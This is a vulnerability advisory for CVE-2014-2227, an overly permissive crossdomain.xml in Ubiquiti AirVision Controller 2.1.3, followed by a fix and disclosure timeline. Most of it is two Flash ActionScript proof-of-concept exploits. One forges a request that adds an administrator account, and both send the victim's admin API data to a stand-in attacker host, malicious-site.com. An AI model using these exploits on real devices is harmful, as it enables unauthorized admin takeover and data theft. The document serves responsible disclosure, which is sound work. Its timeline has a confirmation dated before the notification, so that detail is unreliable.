----------- Vendor: ----------- Ubiquiti Networks (http://www.ubnt.com/) ---------------------------------------------- Affected Products/Versions: ---------------------------------------------- AirVision Controller v2.1.3 Note: Previous versions may be affected ----------------- Description: ----------------- Title: Overly Permissive default crossdomain.xml file CVE: CVE-2014-2227 CWE: http://cwe.mitre.org/data/definitions/264.html Detailed writeup: http://sethsec.blogspot.com/2014/07/cve-2014-2227.html Researcher: Seth Art - @sethsec ------------------------------------------------------------------------------------------------------ POC #1: Using crossdomain.xml to execute CSRF and add an administrator: ------------------------------------------------------------------------------------------------------ // Customized AirVision POC Author: Seth Art (sethsec at gmail.com) // POC Template Author: Gursev Singh Kalra (gursev.kalra at foundstone.com) // POC Template Author's github: (https://github.com/gursev/flash-xdomain-xploit) package { import flash.display.Sprite; import flash.events.*; import flash.net.URLRequestMethod; import flash.net.URLRequest; import flash.net.URLLoader; import flash.net.URLRequestHeader; public class XDomainXploit3 extends Sprite { public function XDomainXploit3() { // Target URL from where the data is to be retrieved var readFrom:String = "https//victim:7443/api/2.0/admin"; var header:URLRequestHeader = new URLRequestHeader("Content-Type", "text/plain; charset=UTF-8"); var readRequest:URLRequest = new URLRequest(readFrom); readRequest.method = URLRequestMethod.POST readRequest.data = "{\"name\":\"csrf-cdp\",\"email\":\"csrf-cdp@gmail.com\",\"userGroup\":\"admin\",\"x_password\":\"password\",\"confirmPassword\":\"password\",\"disabled\":false}"; readRequest.requestHeaders.push(header); var getLoader:URLLoader = new URLLoader(); getLoader.addEventListener(Event.COMPLETE, eventHandler); try { getLoader.load(readRequest); } catch (error:Error) { trace("Error loading URL: " + error); } } private function eventHandler(event:Event):void { // URL to which retrieved data is to be sent var sendTo:String = "http://www.malicious-site.com/crossdomain/store.php" var sendRequest:URLRequest = new URLRequest(sendTo); sendRequest.method = URLRequestMethod.POST; sendRequest.data = event.target.data; var sendLoader:URLLoader = new URLLoader(); try { sendLoader.load(sendRequest); } catch (error:Error) { trace("Error loading URL: " + error); } } } } ----------------------------------------------------------------------- POC #2: Using crossdomain.xml to exfiltrate log data: ----------------------------------------------------------------------- // Customized AirVision POC Author: Seth Art (sethsec at gmail.com) // POC Template Author: Gursev Singh Kalra (gursev.kalra at foundstone.com) // POC Template Author's github: (https://github.com/gursev/flash-xdomain-xploit) package { import flash.display.Sprite; import flash.events.*; import flash.net.URLRequestMethod; import flash.net.URLRequest; import flash.net.URLLoader; public class XDomainXploit extends Sprite { public function XDomainXploit() { // Target URL from where the data is to be retrieved var readFrom:String = "/victim:7443/api/2.0/admin"; var readRequest:URLRequest = new URLRequest(readFrom); var getLoader:URLLoader = new URLLoader(); getLoader.addEventListener(Event.COMPLETE, eventHandler); try { getLoader.load(readRequest); } catch (error:Error) { trace("Error loading URL: " + error); } } private function eventHandler(event:Event):void { // URL to which retrieved data is to be sent var sendTo:String = "http://www.malicious-site.com/admin" var sendRequest:URLRequest = new URLRequest(sendTo); sendRequest.method = URLRequestMethod.POST; sendRequest.data = event.target.data; var sendLoader:URLLoader = new URLLoader(); try { sendLoader.load(sendRequest); } catch (error:Error) { trace("Error loading URL: " + error); } } } } ------------- Solution: ------------- AirVision Controller - Upgrade to UniFi Video v3.0.1 or greater (Note: The application name changed from AirVision to UniFi Video) ----------------------------- Disclosure Timeline: ----------------------------- 2014-02-25: Notified Ubiquiti of crossdomain vulnerability in AirVision product 2014-02-19: Ubiquti confirms receipt of AirVision report and existence of the vulnerability 2014-02-28: CVE-2014-2227 assigned 2014-03-12: Requested status update 2014-03-27: Requested status update 2014-04-07: Requested status update 2014-04-09: Ubiquiti provides timeline for solution 2014-04-18: UniFi Video 3.0.1 is released 2014-06-13: Set public disclosure date of 2014-07-24 2014-07-24: Public disclosure